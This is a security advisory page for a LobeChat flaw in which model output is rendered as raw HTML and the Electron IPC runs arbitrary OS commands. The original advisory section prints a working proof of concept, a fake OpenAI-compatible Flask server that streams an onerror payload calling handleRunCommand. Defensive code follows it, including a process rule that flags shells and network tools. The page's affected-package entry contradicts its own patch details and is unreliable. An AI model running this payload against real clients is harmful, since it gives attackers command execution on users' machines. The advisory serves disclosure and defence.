CVE-2026-42045: LobeChat: XSS-to-RCE via exposed Electron IPC

GHSA-xq4x-622m-q8fq | Severity: MEDIUM | CISA SSVC: Track*
Published May 5, 2026
CISO Take

LobeChat's message renderer falls through to unsafe HTML rendering for unrecognized artifact types, enabling stored XSS; on the Electron desktop client, this XSS can call an unfiltered `runCommand` IPC interface that executes arbitrary OS commands with the victim's privileges — a complete workstation compromise from a single chat message. With 3,535 downstream dependents and a fully public PoC (Python server plus demo video), exploitation requires only convincing a user to configure a malicious LLM provider endpoint — a realistic social engineering vector against AI and security teams that routinely experiment with custom or self-hosted models. Patch immediately to v2.1.48; if patching is not possible, restrict users from configuring untrusted LLM provider endpoints and migrate to the LobeChat web client, which does not expose the Electron IPC attack surface.

Sources: NVD, GitHub Advisory, ATLAS, CISA KEV, EPSS

What is the risk?

The CVSS score of 6.2 materially understates operational risk. While the attack requires user interaction (configuring a malicious provider endpoint), the end impact is full OS command execution — the ceiling of endpoint compromise severity. The complete exploit chain is public, the Python PoC is trivial to deploy, and the target profile (AI-forward teams experimenting with custom LLM endpoints) is exactly the demographic most likely to add an unfamiliar API URL. Risk is HIGH for any organization with LobeChat Electron deployments where users control LLM provider configuration.

How does the attack unfold?

Initial Access
Attacker deploys a malicious OpenAI-compatible API server and social-engineers the victim into adding it as a custom LLM provider in the LobeChat Electron desktop client.
AML.T0011
Malicious Output Injection
The attacker-controlled API returns a chat response containing an artifact tag with an unrecognized MIME type, bypassing LobeChat's type-specific safe renderers and routing to the default HTMLRenderer.
AML.T0077
XSS Execution
HTMLRenderer renders the attacker-controlled HTML payload without sanitization; an img onerror handler executes JavaScript in the Electron renderer process, reaching the parent window context.
AML.T0051.001
RCE via Electron IPC
The JavaScript payload calls `window.parent.electronAPI.invoke('shellCommand.handleRunCommand', {command: '...'})`, and the unfiltered Electron main process executes arbitrary OS commands with the victim's user privileges.
AML.T0050

What systems are affected?

Package: OpenAI Node
Ecosystem: npm
Vulnerable Range: <= 2.1.26
Patched: No patch
11.0K · 4.2K dependents · Pushed 5d ago · 50% patched · ~0d to patch

Do you use OpenAI Node? You're affected.

How severe is it?

CVSS 3.1
6.2 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 18% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Attack Vector (AV): Network
Attack Complexity (AC): High
Privileges Required (PR): High
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): Low
Availability (A): None

What should I do?

  1. Patch immediately: upgrade to @lobehub/lobehub >= v2.1.48.
  2. If patching is not immediately possible, disable or restrict the custom LLM provider configuration feature via MDM or organizational policy.
  3. Migrate at-risk users to the LobeChat web client — the web context does not expose the Electron IPC attack surface.
  4. Detection: monitor for unexpected child processes spawned from the LobeChat Electron process (flag electron/lobechat parent PIDs spawning shells, network tools, or scripting interpreters).
  5. Audit: review LLM provider endpoints currently configured by users and flag any unrecognized or external URLs.
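The detection check in step 4, written as a rule over constructed process-creation events. This is an added example, not code from the advisory or from the LobeHub project; the event field names, the LobeHub binary paths and the list of flagged child images are assumptions to be tuned to your own telemetry.

```typescript
// Added example, not LobeHub code: flag a LobeChat/Electron parent spawning a shell,
// script interpreter or network tool. Event schema, paths and lists are assumptions.
interface ProcessEvent {
  ts: string;
  host: string;
  parentImage: string; // full path of the parent process
  image: string;       // full path of the newly created process
  commandLine: string;
}

interface Finding { ts: string; host: string; reason: string; commandLine: string }

// Executable names that identify the LobeChat desktop client (assumed).
const LOBECHAT_PARENT = /(lobehub|lobechat)(\.exe)?$/i;

// Children a chat client should never spawn: shells, script interpreters,
// download/network tools and macOS "open" (assumed list; tune per environment).
const SUSPICIOUS_CHILD =
  /(^|[\\/])(sh|bash|zsh|dash|cmd\.exe|powershell\.exe|pwsh(\.exe)?|python3?(\.exe)?|perl|ruby|osascript|open|curl(\.exe)?|wget|nc|ncat)$/i;

function evaluate(events: ProcessEvent[]): Finding[] {
  const findings: Finding[] = [];
  for (const e of events) {
    // Electron's own helpers (renderer, GPU, utility) never match SUSPICIOUS_CHILD,
    // so normal client activity stays quiet.
    if (!LOBECHAT_PARENT.test(e.parentImage) || !SUSPICIOUS_CHILD.test(e.image)) continue;
    findings.push({
      ts: e.ts,
      host: e.host,
      reason: `LobeChat parent ${e.parentImage} spawned ${e.image}`,
      commandLine: e.commandLine,
    });
  }
  return findings;
}

// Constructed sample telemetry: two benign events, then two shaped like the PoC's effect.
const SAMPLE_EVENTS: ProcessEvent[] = [
  { ts: "2026-05-05T10:00:01Z", host: "mac-01", parentImage: "/Applications/LobeHub.app/Contents/MacOS/LobeHub",
    image: "/Applications/LobeHub.app/Contents/Frameworks/LobeHub Helper (Renderer).app/Contents/MacOS/LobeHub Helper (Renderer)",
    commandLine: "LobeHub Helper (Renderer) --type=renderer" },
  { ts: "2026-05-05T10:00:02Z", host: "mac-01", parentImage: "/bin/zsh", image: "/bin/sh", commandLine: "/bin/sh -c ls" },
  { ts: "2026-05-05T10:00:03Z", host: "mac-01", parentImage: "/Applications/LobeHub.app/Contents/MacOS/LobeHub",
    image: "/bin/sh", commandLine: "/bin/sh -c 'open -a Calculator'" },
  { ts: "2026-05-05T10:00:04Z", host: "win-01", parentImage: "C:\\Users\\a\\AppData\\Local\\Programs\\LobeHub\\LobeHub.exe",
    image: "C:\\Windows\\System32\\cmd.exe", commandLine: "cmd.exe /c calc.exe" },
];

const FINDINGS = evaluate(SAMPLE_EVENTS);
```

The rule matches on the immediate child only; if your telemetry carries a full ancestry chain, test every ancestor against LOBECHAT_PARENT so a shell that in turn launches another program is still attributed to the client.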

What does CISA's SSVC say?

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001: A.9.3 - AI System Security Testing
NIST AI RMF: MANAGE-2.2 - Risk Treatment Plans
OWASP LLM Top 10: LLM02 - Insecure Output Handling; LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-42045?

LobeChat's message renderer falls through to unsafe HTML rendering for unrecognized artifact types, enabling stored XSS; on the Electron desktop client, this XSS can call an unfiltered `runCommand` IPC interface that executes arbitrary OS commands with the victim's privileges — a complete workstation compromise from a single chat message. With 3,535 downstream dependents and a fully public PoC (Python server plus demo video), exploitation requires only convincing a user to configure a malicious LLM provider endpoint — a realistic social engineering vector against AI and security teams that routinely experiment with custom or self-hosted models. Patch immediately to v2.1.48; if patching is not possible, restrict users from configuring untrusted LLM provider endpoints and migrate to the LobeChat web client, which does not expose the Electron IPC attack surface.

Is CVE-2026-42045 actively exploited?

No confirmed active exploitation of CVE-2026-42045 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-42045?

  1. Patch immediately: upgrade to @lobehub/lobehub >= v2.1.48.
  2. If patching is not immediately possible, disable or restrict the custom LLM provider configuration feature via MDM or organizational policy.
  3. Migrate at-risk users to the LobeChat web client — the web context does not expose the Electron IPC attack surface.
  4. Detection: monitor for unexpected child processes spawned from the LobeChat Electron process (flag electron/lobechat parent PIDs spawning shells, network tools, or scripting interpreters).
  5. Audit: review LLM provider endpoints currently configured by users and flag any unrecognized or external URLs.

What systems are affected by CVE-2026-42045?

This vulnerability affects the following AI/ML architecture patterns: AI chat applications (Electron desktop), LLM API integrations, Custom LLM provider deployments.

What is the CVSS score for CVE-2026-42045?

CVE-2026-42045 has a CVSS v3.1 base score of 6.2 (MEDIUM). The EPSS exploitation probability is 0.27%.

What is the AI security impact?

Affected AI Architectures

AI chat applications (Electron desktop)
LLM API integrations
Custom LLM provider deployments

MITRE ATLAS Techniques

AML.T0011 User Execution
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0077 LLM Response Rendering
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.3
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM02, LLM08

What are the technical details?

Original Advisory

### Summary

The vulnerability was automatically discovered by an AI agent and then manually verified. LobeChat's message rendering mechanism has a stored cross-site scripting (XSS) vulnerability. Combined with the Electron main process's exposed insecure IPC interface, attackers can construct malicious payloads to achieve an attack chain from XSS to remote code execution (RCE). The LobeChat team verified this vulnerability in lobehub v2.1.23, and it also exists in the latest version.

### Details

When LobeChat processes custom tags in the Render process of `src/features/Portal/Artifacts/Body/Renderer/index.tsx`, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering.

```typescript
const Renderer = memo<{ content: string; type?: string }>(({ content, type }) => {
  switch (type) {
    case 'application/lobe.artifacts.react': {
      return <ReactRenderer code={content} />;
    }
    case 'image/svg+xml': {
      return <SVGRender content={content} />;
    }
    case 'application/lobe.artifacts.mermaid': {
      return <Mermaid variant={'borderless'}>{content}</Mermaid>;
    }
    case 'text/markdown': {
      return <Markdown style={{ overflow: 'auto' }}>{content}</Markdown>;
    }
    default: {
      return <HTMLRenderer htmlContent={content} />;
    }
  }
});

export default Renderer;
```

If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side.

Additionally, LobeChat's Electron main process exposes an IPC interface called `runCommand`, used to invoke system commands. This interface allows arbitrary command execution and does not filter the `command` parameter. Therefore, if an attacker can obtain a handle to `window.parent.electronAPI` via XSS and call the `runCommand` method of the IPC, the `ipcMain` process can execute arbitrary system commands with the current user's privileges.

```typescript
@IpcMethod()
async handleRunCommand({
  command,
  description,
  run_in_background,
  timeout = 120_000,
}: RunCommandParams): Promise<RunCommandResult> {
  ...
  const childProcess = spawn(shellConfig.cmd, shellConfig.args, {
    env: process.env,
    shell: false,
  });
  ...
}
```

### PoC

The attacker launched a malicious OpenAI gateway on port 5001:

```python
from flask import Flask, Response, request, jsonify
import time
import json

app = Flask(__name__)

fake_api_key = "sk-test"


@app.route('/v1/chat/completions', methods=['POST', 'OPTIONS'])
def chat_completions():
    if request.method == 'OPTIONS':
        return Response(status=200, headers={
            'Access-Control-Allow-Origin': '*',
            'Access-Control-Allow-Headers': '*'
        })

    # Check for API Key
    auth_header = request.headers.get('Authorization')
    print(auth_header)
    if not auth_header or auth_header != f'Bearer {fake_api_key}':
        return jsonify({"error": {"message": "Invalid API Key", "type": "invalid_request_error", "code": "invalid_api_key"}}), 401

    def generate():
        payload = """
<lobeArtifact type="nebula">
<img src=x onerror='window.parent.electronAPI.invoke("shellCommand.handleRunCommand", {command:"open -a Calculator"})'>
</lobeArtifact>
"""
        # Split payload into chunks to simulate streaming
        chunks = [payload[i:i+10] for i in range(0, len(payload), 10)]
        for chunk in chunks:
            data = {
                "id": "chatcmpl-hpdoger-123",
                "object": "chat.completion.chunk",
                "created": int(time.time()),
                "model": "gpt-3.5-turbo",
                "choices": [{
                    "index": 0,
                    "delta": {"content": chunk},
                    "finish_reason": None
                }]
            }
            yield f"data: {json.dumps(data)}\n\n"
            time.sleep(0.1)

        # End of stream
        final_data = {
            "id": "chatcmpl-hpdoger-123",
            "object": "chat.completion.chunk",
            "created": int(time.time()),
            "model": "gpt-3.5-turbo",
            "choices": [{
                "index": 0,
                "delta": {},
                "finish_reason": "stop"
            }]
        }
        yield f"data: {json.dumps(final_data)}\n\n"
        yield "data: [DONE]\n\n"

    return Response(generate(), mimetype='text/event-stream', headers={
        'Access-Control-Allow-Origin': '*',
        'Access-Control-Allow-Headers': '*'
    })


@app.route('/v1/models', methods=['GET'])
def models():
    return jsonify({
        "object": "list",
        "data": [{
            "id": "gpt-3.5-turbo",
            "object": "model",
            "created": 1677610602,
            "owned_by": "openai"
        }]
    })


if __name__ == '__main__':
    print("Evil OpenAI-compatible server running on http://127.0.0.1:5001")
    app.run(port=5001, debug=True)
```

The victim opens the LobeChat application and configures an LLM Provider, entering the address of the HTTP server provided by the attacker.

![image](https://github.com/user-attachments/assets/86fe8f76-d75f-4e23-a2c5-fe29b124c7a7)

The victim was exposed to an arbitrary command execution vulnerability while chatting.

![image](https://github.com/user-attachments/assets/0a84171f-ec78-4166-b7ab-298ece6b06b9)

### Reproduction

For attack reproduction, refer to this video. Once the victim configures the attacker's LLM provider endpoint, arbitrary commands can be executed. Here, our demonstration `opens a calculator` in the victim's environment.

https://github.com/user-attachments/assets/6383e996-9148-4e88-8e25-90260104368d

### Impact

Affected LobeChat clients can connect to the attacker's LLM endpoint and trigger arbitrary command execution simply by sending normal conversation messages.

### Patch

A patch is available at https://github.com/lobehub/lobehub/releases/tag/v2.1.48.
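The renderer's type switch modelled as a pure function, with the fall-through shown in the advisory beside an allowlist version that renders any unrecognized artifact type as escaped plain text. This is an added example, not code from the advisory or the LobeHub project; the renderer names follow the advisory's snippet, while the explicit `text/html` entry and the escaping helper are assumptions.

```typescript
// Added example, not LobeHub code: artifact-type dispatch with a safe default.
type Renderer = "react" | "svg" | "mermaid" | "markdown" | "html" | "plaintext";

interface RenderPlan {
  renderer: Renderer;
  body: string; // what the chosen renderer receives
}

// Mirrors the advisory's switch: anything not listed falls through to the HTML
// renderer, so an artifact with type="nebula" is rendered as raw HTML.
function vulnerableDispatch(type?: string): Renderer {
  switch (type) {
    case "application/lobe.artifacts.react": return "react";
    case "image/svg+xml": return "svg";
    case "application/lobe.artifacts.mermaid": return "mermaid";
    case "text/markdown": return "markdown";
    default: return "html";
  }
}

// Escape the five HTML-significant characters so markup is displayed, not interpreted.
const ESCAPES: Record<string, string> = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s: string): string {
  return s.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Allowlist of artifact types. "text/html" is opted in explicitly (assumed); the HTML
// renderer must still sanitize its input, which is outside this example. A Map rather
// than a plain object keeps prototype keys such as "constructor" from matching.
const KNOWN_TYPES = new Map<string, Renderer>([
  ["application/lobe.artifacts.react", "react"],
  ["image/svg+xml", "svg"],
  ["application/lobe.artifacts.mermaid", "mermaid"],
  ["text/markdown", "markdown"],
  ["text/html", "html"],
]);

// Hardened dispatch: normalise the MIME type, consult the allowlist, and render
// anything unknown or missing as escaped text so no markup can execute.
function safeDispatch(content: string, type?: string): RenderPlan {
  const key = (type ?? "").trim().toLowerCase();
  const renderer = KNOWN_TYPES.get(key);
  if (renderer === undefined) {
    return { renderer: "plaintext", body: escapeHtml(content) };
  }
  return { renderer, body: content };
}

// Constructed input shaped like the PoC artifact body; the handler is a placeholder.
const UNKNOWN_TYPE_ARTIFACT = `<img src=x onerror="/* attacker script */">`;
```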

Exploitation Scenario

An attacker deploys a malicious OpenAI-compatible API server — the public PoC is roughly 50 lines of Python/Flask — and advertises it as a free GPT-4-compatible endpoint in developer forums or via a spearphishing email targeting an AI or security team. The victim, accustomed to configuring custom LLM providers for internal tooling or model evaluation, adds the URL to LobeChat Electron. On the next chat interaction, the malicious server streams a response containing an artifact tag with an unrecognized MIME type; LobeChat's renderer defaults to HTMLRenderer without sanitization. An embedded img onerror handler calls `window.parent.electronAPI.invoke('shellCommand.handleRunCommand', {command: '...'})`, executing arbitrary shell commands — exfiltrating environment variables containing API keys, installing a reverse shell, or enrolling the machine in a botnet — while the chat UI displays a normal-looking response.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N

Timeline

Published
May 5, 2026
Last Modified
May 5, 2026
First Seen
May 5, 2026
